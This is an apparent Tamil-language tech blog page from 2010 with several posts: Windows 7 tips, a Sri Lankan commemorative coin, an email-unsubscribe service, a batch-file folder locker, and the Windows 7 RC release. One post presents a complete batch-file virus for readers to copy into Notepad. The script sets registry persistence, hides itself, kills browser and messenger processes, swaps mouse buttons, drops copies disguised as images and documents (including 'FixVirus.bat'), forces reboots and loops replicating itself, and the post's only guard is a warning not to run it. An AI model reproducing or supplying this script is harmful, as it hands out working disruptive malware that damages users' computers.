Tuesday 28 December 2010

விண்டோஸ் 7 அற்புத வசதிகள்


விண்டோஸ் விஸ்டாவில் கிடைக்காத புகழை, எப்படியும் விண்டோஸ் 7 மூலம் பிடித்துவிட எண்ணிய மைக்ரோசாப்ட், தன் புதிய சிஸ்டத்தில் பல எதிர்பாராத வசதிகளைத் தந்துள்ளது. அவற்றில் சிலவற்றை இங்கு காணலாம். இந்த சிஸ்டத்திற்கு மாறியுள்ள அனைவருக்கும் இவை உதவலாம்.

1. வேகமாக இயங்க பிளாஷ் ட்ரைவ்: கம்ப்யூட்டர் சிஸ்டம் இயங்கும் வேகத்தினை அதிகப்படுத்த ஓர் எளிய வழி, அதன் ராம் (RAM Random Access Memory) மெமரியை அதிகப்படுத்து வதுதான். ராம் மெமரியை அதிகப்படுத்துகையில்,உங்கள் கம்ப்யூட்டர் சி.பி.யு. தனக்கு வேண்டிய டேட்டாவிற்காக, ஹார்ட் டிஸ்க்கை அணுக வேண்டிய தேவை குறையும். ராம் மெமரியிலிருந்து டேட்டா படிக்கப்படுவதால்,ராம் மெமரி, ஹார்ட் டிஸ்க்கினைக் காட்டிலும் கூடுதல் வேகத்தில் டேட்டாவினைத் தருவதால், கம்ப்யூட்டர் அதிக வேகத்தில் இயங்கும். மேலும் ராம் மெமரி தற்காலிக மெமரி என்பதால், அதில் ஏற்றப்படும் டேட்டா, கம்ப்யூட்டர் இயங்கும் வரையில் மட்டுமே இருக்கும். கம்ப்யூட்டரை ஆப் செய்தவுடன், டேட்டா தங்காது.

ஆனால் சில கம்ப்யூட்டர் மதர்போர்டுகளில் தான், ராம் மெமரியை அதிகப்படுத்த காலியான ஸ்லாட்டுகள் இருக்கும். சில கம்ப்யூட்டர்கள் இவற்றை ஏற்றுக் கொள்ளாது. மேலும் மதர்போர்ட் வரை சென்று, புதிய ராம் மெமரி சிப்களை இணைப்பது எல்லோராலும் இயலாத காரியம். இதற்கு விண்டோஸ் 7 ஓர் எளிய வழி ஒன்றைத் தருகிறது. இதன் பெயர் ரெடி பூஸ்ட் (Ready Boost). கூடுதல் மெமரி கொள்வதற்கு, ராம் நினைவகச் சிப்களைப் பயன்படுத்த வேண்டிய தில்லை. நம்மிடம் உள்ள பிளாஷ் ட்ரைவினையே அதற்குப் பயன்படுத்தலாம். ஆம், யு.எஸ்.பி. ப்ளாஷ் ட்ரைவ் ஒன்றினை,அதன் போர்ட்டில் செருகி, விண்டோஸ் 7 சிஸ்டத்தில் சில அமைப்புகளை ஏற்படுத்தினால், உங்கள் கம்ப்யூட்டர், பிளாஷ் ட்ரைவினை கூடுதல் ராம் மெமரியாக எடுத்துக் கொண்டு செயல்படும். உங்கள் கம்ப்யூட்டரின் பின்புறம் ஏதேனும் யு.எஸ்.பி.போர்ட்டில், பிளாஷ் ட்ரைவ் ஒன்றினைச் செருகி, இந்த செட் அப் மாற்றங்களை ஏற்படுத்தலாம். அப்போதுதான், நிலையாக அந்த பிளாஷ் ட்ரைவ், கூடுதல் ராம் மெமரியாக என்றும் செயல்படும்.

பிளாஷ் ட்ரைவினைச் செருகியவுடன், சிறிய விண்டோ பாக்ஸ் ஒன்று எழுந்து வரும். இதில் “Speed up my system, using Windows Ready Boost”என்று ஒரு பிரிவு இருக்கும். இந்த விண்டோ கிடைக்கவில்லை என்றால், Start மெனு சென்று My Computer தேர்ந்தெடுக்கவும். இங்கு காட்டப்படும் பிளாஷ் ட்ரைவில், ரைட் கிளிக் செய்து, கிடைக்கும் கீழ் விரி மெனுவில், Propertiesஎன்பதனைத் தேர்ந்தெடுக்கவும். அதன் பின் , கிடைக்கும் டேப்களில்Ready Boostஎன்ற டேப்பினைத் தேர்ந்தெடுக்கவும். இந்த டேப்பிற்கான விண்டோவில் Use this device என்று ஒரு வரி இருக்கும். இந்த ரேடியோ பட்டனைத் தேர்ந்தெடுக்கவும். பின்னர், கீழாக உள்ள வேகத்தின் அளவை ஓரளவிற்கு அதிகப்படுத்தவும். இதற்குக் குறைந்த பட்சம் 256 எம்பி அளவு உள்ள பிளாஷ் ட்ரைவ் தேவை. ஆனால் 1 ஜிபி பயன்படுத்துவது நல்லது. இப்போது மிகவும் குறைவான விலையில், பிளாஷ் ட்ரைவ் கிடைப்பதால், இன்னும் கூடுதலாக கொள்ளளவு கொண்ட பிளாஷ் ட்ரைவினைப் பயன்படுத்தலாம். உங்கள் கம்ப்யூட்டர் இதன் பின் வேகமாகச் செயல்படுவதனைக் காணலாம்.

2.கிளிப் போர்டைக் காலி செய்திட: பல வேளைகளில் நாம், நம்மை அறியாமல், பெரிய அளவில் டேட்டாவினை கிளிப் போர்டுக்குக் கொண்டு செல்வோம். அதனைப் பயன்படுத்துவோம்; ஆனால் கிளிப் போர்டில் இருந்து நீக்க மாட்டோம்;அல்லது மறந்துவிடுவோம். அதனால் தான் ஆபீஸ் புரோகிராம்களை மூடுகையில்,நீங்கள் அதிகமான டேட்டாவினைக் கிளிப் போர்டில் வைத்திருக்கிறீர்கள். அதனை அப்படியே வைத்திருக்கவா? என்று ஒரு கேள்வி கேட்கப்படும். இவ்வாறு கிளிப் போர்டில் வைக்கப்படும் டேட்டா அளவு பெரிய அளவில் இருந்தால், சிஸ்டம் இயங்கும் வேகம் குறையும். ஏனென்றால், இது அதிகமான இடத்தை எடுத்துக் கொள்ளும். பெரிய அளவிலான டெக்ஸ்ட் அல்லது படம் ஒன்றைக் காப்பி செய்கிறீர்கள். அது கிளிப்போர்டில் சென்று அமர்ந்து கொள்கிறது. பின் அதனை இன்னொரு பைலில் ஒட்டுகிறீர்கள். ஒட்டப்பட்டாலும், அது கிளிப் போர்டில் இடத்தைப் பிடித்துக் கொண்டுதான் இருக்கும். இதனால் கம்ப்யூட்டர் இயங்கும் வேகம் தடைப்படும். இதனைத் தீர்க்க, கிளிப் போர்டில் உள்ளதை, உடனே எளிதான முறையில் காலி செய்திட வேண்டும். இதற்கென ஷார்ட் கட் ஒன்றை டெஸ்க் டாப்பில் அமைக்கலாம். மேலும் காலி செய்வதன் மூலம், கிளிப் போர்டில் உள்ளதை, கம்ப்யூட்டரைப் பயன்படுத்தும் மற்றவர்கள் அறியும் வாய்ப்பினைத் தடுக்கலாம்.

முதலில், டெஸ்க்டாப்பில் ரைட் கிளிக் செய்து கிடைக்கும் மெனுவில்New,பின் Shortcut என்பவற்றைத் தேர்ந்தெடுக்கவும். இப்போது, Create Shortcut என்னும் சிறிய விண்டோ கிடைக்கும். இதில் நீள் சதுரம் ஒன்று தரப்படும். அதில் cmd/c “echo off /clip” என டைப் செய்திடவும். அடுத்து நெக்ஸ்ட் என்பதில் டைப் செய்து, பின் இந்த ஷார்ட் கட் கீக்கு ஒரு பெயர் கொடுத்து, Finish என்பதில் கிளிக் செய்து வெளியேறவும். இனி இந்த ஷார்ட் கட் ஐகானில் கிளிக் செய்திடுகையில், கிளிப் போர்டில் காப்பி செய்த டெக்ஸ்ட், படம் போன்றவை நீக்கப்பட்டு, மெமரி இடம் அதிகமாகும்.

3. விண்டோஸ் டெக்ஸ்ட் பெரிதாக்க: விண்டோஸ் 7 சிஸ்டத்தில் டெக்ஸ்ட் சைஸ் 96 டி.பி.ஐ. (DPI dots per inch) அதாவது 100%. ஆனால் இதனையும் நாம் விரும்பும்படி அட்ஜ்ஸ்ட் செய்திடலாம். இதனை நம் மானிட்டரின் ஸ்கிரீன் ரெசல்யூசனை மாற்றாமலேயே மேற்கொள்ளலாம். ஸ்டார்ட்(Start)மெனு சென்று,கண்ட்ரோல் பேனல்(Control Panel) தேர்ந்தெடுக்கவும். கண்ட்ரோல் பேனல் விண்டோவில் டிஸ்பிளே (Display) என்பதனைத் தேர்ந்தெடுக்கவும். பின்னர் Adjust Font Size (DPI) என்பதில் கிளிக் செய்திடவும். இதில் Large Sizeஎன்பதைத் தேர்ந்தெடுக்கவும். பின் Apply மற்றும் OK கிளிக் செய்து வெளியேறவும். அடுத்து விண்டோஸ் மீண்டும் பூட் ஆகும்போது, இந்த மாற்றங்கள் அமலாக்கப்பட்டு, விண்டோஸ் டெக்ஸ்ட் பெரிதாகக் காட்டப்படும்.

இந்த DPI Scaling Windowவில், நமக்கேற்ற வகையில், எழுத்தின் அளவை செட் செய்திட,ஒரு ஸ்கேல் கொடுக்கப்பட்டிருக்கும். இதனை எப்படிக் கையாள்வது என்பது, இதனைப் பார்த்தாலே புரியும். இதனை நீங்களாக செட் செய்து, பின் டெக்ஸ்ட் அளவைப் பார்த்து,அதன் பின் உங்கள் மனதிற்கு நிறைவைத் தரும் வரையில், அளவை மாற்றிப் பின் சரியான அளவு வந்த பின், அதனையே கொள்ளலாம்.

4. அட்ரஸ் பார் வழி இணைய தளம்: நாம் எல்லாரும், இணையதளம் ஒன்றைப் பார்க்க, முதலில் பிரவுசரைத் திறக்கிறோம். பிரவுசரில் ஹோம் பேஜாக ஏதேனும் தளம் ஒன்றை அமைத்திருந்தால், முதலில் அது திறக்கப்படுகிறது. பின்னர்,நாம் காண விரும்பும் தளத்தின் முகவரியினை, அட்ரஸ் பாரில் டைப் செய்து பெறுகிறோம். இது சற்று தேவையற்ற நேரத்தை எடுத்துக் கொள்கிறது. விண்டோஸ் 7தொகுப்பில் இதற்கு ஒரு சுருக்கு வழி உள்ளது.

முதலில் உங்கள் டாஸ்க் பாரில் ரைட் கிளிக் செய்திடவும். பின்னர் கிடைக்கும் மெனுவில், Toolbars தேர்ந்தெடுத்து, அதில் Addressஎன்பதில் கிளிக் செய்திடவும். இப்போது உங்கள் டாஸ்க் பாரில், Address என்ற வரி கிடைக்கும். இதில் நேரடியாக,நீங்கள் காண விரும்பும், இணைய தள முகவரியினை டைப் செய்திடலாம். இதில் http://அல்லது www என்பதெல்லாம் தேவையில்லை. எடுத்துக்காட்டாக ஞீடிணச்ட்ச்டூச்ணூ என்று நேரடியாக டைப் செய்திடலாம். டைப் செய்தவுடன், என்டர் தட்டவும். நீங்கள் செட் செய்துள்ள பிரவுசர் இயக்கப்பட்டு, இந்த இணைய தளம் காட்டப்படும். டாஸ்க் பாரில் உள்ள அட்ரஸ் பாரில் உள்ள இணைய முகவரியின நீக்க, ஷார்ட் கட் மெனுவில் அட்ரஸ் பாரில் உள்ள டிக் அடையாளத்தை எடுத்துவிடவும். இது போல பல செயல்பாடுகளில், விண்டோஸ் 7 தொகுப்பு நம் வேலைத்திறனைக் குறைப்பதுடன்,விரைவாகவும் செயல்பட பல வழிகளைத் தருகிறது

Monday 20 December 2010

இலங்கையின் புதிய 5000 ரூபாய் ஞாபகார்த்த நாணயக் குற்றி

இலங்கை மத்திய வங்கி தனது 60 வருட நிறைவையொட்டி 5000 ரூபாய் ஞாபகார்த்த நாணயக் குற்றியை வெளியிட்டிருக்கிறது ( 'Frosted Proof' crown sized silver commemorative coin).இலங்கையில் வெளியிடப்பட்டுள்ள நாணயக் குற்றிகளில் பெறுமதி கூடியதும். மல்டி கலர் எனப்படும் பல வர்ணங்களைக் கொண்டதுமான வெள்ளி நாணையக் குற்றி இதுவாகும்.
1950ம் ஆண்டு முதல் 2010 ஆகஸ்ட் 28 உடன் இலங்கை மத்திய வங்கி தனது 60 வருடங்களை பூர்த்தி செய்கிறது.

இந்த நாணயக் குற்றியின் மத்திய பகுதியில் வர்ணத்தினாலான இலங்கை மத்திய வங்கியின் சின்னம்பொறிக்கப் பட்டிருக்கின்றது. அதன் கீழே நாணையத்தின் முகப்பின் ஓரம் வழியாக 60 ஆண்டுகளை குறிக்கும் முகமாக1950-2010 என்றும் தொடர்ந்து ”இலங்கை மத்திய வங்கி” என்று தமிழ், சிங்களம்,ஆங்கிலம் ஆகிய மொழிகளில் அச்சிடப்பட்டுள்ளது.

முன்பக்கம்

நாணயத்தின் பின் புறத்தில் அடர்ந்து விரிந்த மரம் பொறிக்கப்பட்டுள்ளது.
இது இலங்கைப் பொருளாதாரத்தின் வளர்ச்சியையும் உறுதிப்பாட்டையும்
குறிக்கிறது.
அதன்படி நாணயத்தின் பின்புற ஓரத்தின் வழியே “வளர்ச்சியும் உறுதிப்பாடும்” என்று தமிழ், சிங்களம், ஆங்கிலம் ஆகிய மொழிகளில் பொறிக்கப்பட்டுள்ளது.
மரத்தின் கீழே நாணயத்தின் பெறுமதியான 5000 என்ற இலக்கமும் ”ரூபாய்” என்ற சொல் தமிழ் சிங்களம் ஆங்கில ஆகிய மொழிகளில்
பொறிக்கப்பட்டிருக்கிறது.
மரத்தின் ஓரத்தின் வலது புறத்தில் 2010 என்ற வெளியிடப்பட்ட ஆண்டும் பொறிக்கப்பட்டுள்ளது.

பின் புறம்

இந் நாணயக் குற்றியின் நிறை 28.28 கிராம்
விட்டம் 38.61 மில்லி மீற்றர்.
இதுஐக்கிய ராச்சியத்தின் Royal Mint நிறுவனத்தின் தரச் சான்றிதழ் பெற்றிருக்கிறது.

இந்நாணயம் அடுத்த வருடம் ஜனவரி மாதத்திலிருந்து மக்கள் வாங்கிக்கொள்ள முடியும்.
இந்த 5000 ரூபாய் ஞாபகார்த்த நாணயத்தை 7000 ரூபாய்க்கு மத்திய வங்கியின் பிரதான காரியாலயத்திலோ, மாகாண மட்டங்களிளுள்ள நாணய அருங்காட்சியக அலுவலகங்களிலோஅல்லது சர்வதேச வலைப்பின்னல் மூலமாக www.cbsl.gov.lk என்ற இணையத்தளத்தின் மூலமாகவோ வாங்கிக்கொள்ளலாம்

Friday 17 December 2010

நம் மெயிலுக்கு வரும் தேவையில்லாத மெயில்களை எப்படி தடுப்பது


நாம் இணையத்தில் பல்வேறு தளங்களில் உள்ளே உள்ளே செல்லும் போது நம் விவரங்களை கொடுக்கும் போது நம்முடைய மெயில் ஐடியையும் கொடுப்போம். அப்படி கொடுத்த மெயில் ஐடிக்கு அந்த தளத்தில் இருந்து அவர்களின் விளம்பர செய்திகளை நம் மெயிலுக்கு அனுப்பி தொல்லை கொடுப்பார். ஒரு சில மெயில்களில் unsubscribe என்ற வசதி இருக்கும் அதன்மூலம் நாம் தடுத்து விடலாம் ஆனால் ஒருசில மெயில்களில் இந்த வசதி இருக்காது அது போன்ற மெயில்களை எப்படி நாம் unsubscribe செய்வது என்று இங்கு பார்ப்போம்.
  • இந்த வேலையை சுலபமாக செய்ய ஒரு தளம் உள்ளது. முதலில் இந்தhttps://www.unsubscribe.com/ லிங்கில் சென்று அந்த தளத்தை திறந்து கொள்ளவும்.
  • அங்கு உள்ள Get Started என்ற பட்டனை அழுத்தவும். உங்களுக்கு கீழே உள்ளதை போல பக்கம் திறக்கும்.
  • இதில் உங்கள் விவரங்களை கொடுத்து கீழே உள்ள Submit என்ற பட்டனை அழுத்தவும். (உங்கள் மெயிலுக்கு அதே பாஸ்வேர்ட் கொடுக்க வேண்டாம் வேறு ஏதேனும் கொடுக்கவும்)
  • Submit பட்டனை அழுத்தியவுடன் உங்களுக்கு கீழே இருப்பதை போல விண்டோ வரும்.
  • இதில் இரண்டு வகை உள்ளது இதில் எப்பவும் போல Free க்ளிக் செய்து உள்ளே நுழையவும் (இதுக்கெல்லாம் காசு செலவு பண்ண நாங்க என்ன முட்டாளா).
  • அடுத்து வரும் விண்டோவில்
  • அடுத்து வரும் விண்டோவில் Download பட்டனை அழுத்தினால் உங்களின் நீட்சி டௌன்லோட் ஆகும். அடுத்து வரும் விண்டோவில் Install என்ற பட்டனை அழுத்தி உங்கள் கணினியில் install செய்து கொள்ளுங்கள்.
  • இப்பொழுது உங்கள் மெயிலை ஓபன் செய்து கொள்ளுங்கள். ஏற்கனவே ஓபன் செய்து இருந்தால் refresh கொடுங்கள்.
  • உங்களுக்கு Unsubscribe என்ற புதிய பட்டன் வந்திருப்பதை காண்பீர்கள்.
  • இப்பொழுது Unsubscribe வசதி இல்லாத மெயிலை ஓபன் செய்து கொள்ளுங்கள். ஓபன் செய்ததும் இந்த Unsubscribe என்ற பட்டனை அழுத்தவும்.
  • அவ்வளவு தான் அடுத்த நிமிடமே உங்களுக்கு இந்த மெயிலை தடை செய்ததற்கான ஒரு மெயில் Unsbuscribe தளத்தில் இருந்து உங்களுக்கு வரும்.
  • அவ்வளவு தான் தொல்லை மெயிலுக்கு தடை செய்தி அனுப்பப்பட்டு விட்டது.
  • இன்றிலுருந்து அதிகபட்சமாக 10 நாட்களுக்கு மேல் அந்த தடை செய்த ஈமெயில் வருவது தடை செய்யப்படு

windows xp யில் folder lock மென்பொருள் உருவாக்குதல்

நாம் நம்முடைய data வை பாதுகாப்பாக வைக்க பல folder lock மென்பொருள் install செய்து பயன்படுத்துவோம் அல்லது அந்த file க்கு password கொடுத்து பாதுகாப்போம் ஆனால் இப்படியில்லாமல் நம்முடைய data வை பாதுகாப்பாக வைக்க நாமே ஒரு folder lock மென்பொருள் உருவாக்குவோம்.கிழே உள்ள coding ஐ copy செய்து Notepad ல் paste செய்யுங்கள் பின்பு save செய்து கொள்ளுங்கள் அதாவது filename.bat என்று save செய்துகொள்ளுங்கள்.


cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==PASSWORD goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


அதாவது நீங்கள் save செய்த bat file இவ்வாறு இருக்கும்.
இதை double click செய்தால் ஒரு new folder அருகில் வரும் கிழே உள்ள படத்தை பாருங்கள்.


அந்த folder ல் நாம் எந்த file lock செய்ய விரும்புகிறோமோ அந்த file இந்த folder ல் வைத்துகொள்ளுங்கள் பிறகு bat file ஐ double click செய்யுங்கள் ஒரு command window open ஆகும்.அதில் உங்கள் folder lock செய்கிரிர்களா இல்லையா என்று கேட்கும் அதாவது ( Y / N) அதில் Y (yes) என்று கொடுங்கள்.


அந்த folder மறைந்த விடும் மீண்டும் bat file ஐ double click செய்யுங்கள் command window open ஆகும் அதில் password கேட்கும் password என்று கொடுத்தால் மறைந்து இருந்த folder வரும் அதில் உள்ள நீங்கள் வைத்த data வை பயன்படுத்தி கொள்ளலாம்.


நீங்கள் விரும்பும் password கொடுக்க வேண்டும் என்றால் இந்த coding ல் சென்று 23-ஆவது line ல் PASSWORD இருக்கும் அதை எடுத்துவிட்டு நீங்கள் விரும்பும் password அதில் type செய்து save செய்து கொள்ளுங்கள் அவ்வளவு தான் இப்போது நமக்கு folder lock தயாராகவிட்டது

கணினியை தாக்கும் virus உருவமைப்பு

virus என்றாலே நமக்கு ஒரு பயம், எப்போது virus நம் கணினியில் வருகிறது என்று தெரியாது ஆனால் சில நேரங்களிலோ அல்லது நாட்களிலோ நம் கணினியை சேதபடுத்தாமல் போகாது என்னதான் ஆண்டி virus மென்பொருள் இன்ஸ்டால் செய்திருந்தாலும் நம் கணினியில் virus புகுந்து விடுகிறது.

வாருங்கள் virus coding எப்படிஇருக்கிறது என்று பார்ப்போம். NOTEPAD ஐ open செய்து கொள்ளுங்கள் அதில் கிழ் கண்ட coding ஐ copy செய்து paste செய்து கொள்ளுங்கள்.

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v
Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

அடுத்ததாக virus.bat என்று save செய்தால் கீழ் கண்ட விண்டோ open ஆகும்.


நான் ஆண்டி virus AVAST 4.8 கணினியில் install செய்திருக்கிறேன்.

முக்கியமான குறிப்பு,
  • இதை செய்து பார்ப்பதற்கு முன்பு உங்கள் கணினியில் ஆண்டி வைரஸ் மென்பொருள் install செய்திருக்க வேண்டும்.
  • மிக கவனமாக செய்து பார்க்கவும்.
  • நீங்கள் save செய்திருக்கிற bat file , அதாவது நீங்கள் bat file desktop அல்லது mydocument அல்லது drive லிலோ save செய்திருக்கிர்கள் என்று வைத்துக்கொள்வோம் அதை double click செய்து RUN செய்யாதிர்கள்.
  • அப்படி RUN செய்தால் உங்கள் data கள் அழிய நேரிடும்.
  • முக்கியமான ஒன்று இதை தவறாக செயல்படுத்தாதிர்கள்

வந்துவிட்டது விண்டோஸ் 7 RC

நீண்ட நாட்களாக காத்தி்ருந்த விண்டோஸ் 7 RC (Release Candidate) இப்பொழுது எல்லோரும் தரவிறக்கம் செய்து கொள்ளும் வகையில் மைக்ரோசாப்ட் நிறுவனம் தந்துள்ளது.

வந்துவிட்டது விண்டோஸ் 7 RC



குறிப்பு : விண்டோஸ் 7 RC பயணாளர்கள் சோதித்து பார்க்க வெளியிடப்படுகிறது.

அது மட்டும் இல்லாமல் விண்டோஸ் 7 RC க்கு 1 வருடம் இலவச உரிமம் வழங்கப்படுகிறது. இந்த மாதம் முதல் ஜுன் 1, 2010 வரை இலவச உரிமம் தரப்படுகிறது. அதன் பின்னும் விண்டோஸ் 7 RC உபயோகித்தால் 2 மணி நேரத்துக்கு ஒரு முறை உங்கள் கணினி Restart ஆகும் அதனால் அதற்க்குள் உங்கள் விண்டோஸ் 7 RCயை விண்டோஸ் 7க்கு மாற்றிவிடுங்கள். விண்டோஸ் 7 பயன்படுத்தும் போது நீங்கள் விண்டோஸ் XP mode என்ற வசதியையும் பயன்படுத்தலாம். இந்த வசதி பழைய விண்டோஸ் XP யை virtual முறையில் இயங்க வைக்கும். இதனால் பழைய விண்டோஸ் XP நிரல்களை தங்கு தடையின்றி விண்டோஸ் 7ல் இயக்கலாம்.

குறிப்பு : விண்டோஸ் 7 RC தரவிறக்கம் ஜுலை 2009 இருக்கும் அதனால் torrent அல்லது file sharing போன்ற தளங்களில் இருந்து தரவிறக்கம் செய்யாதீர்கள் இதில் வைரஸ் வர வாய்ப்புகள் அதிகம்.

விண்டோஸ் 7 RC கணினி வன்பொருள் தேவைகள்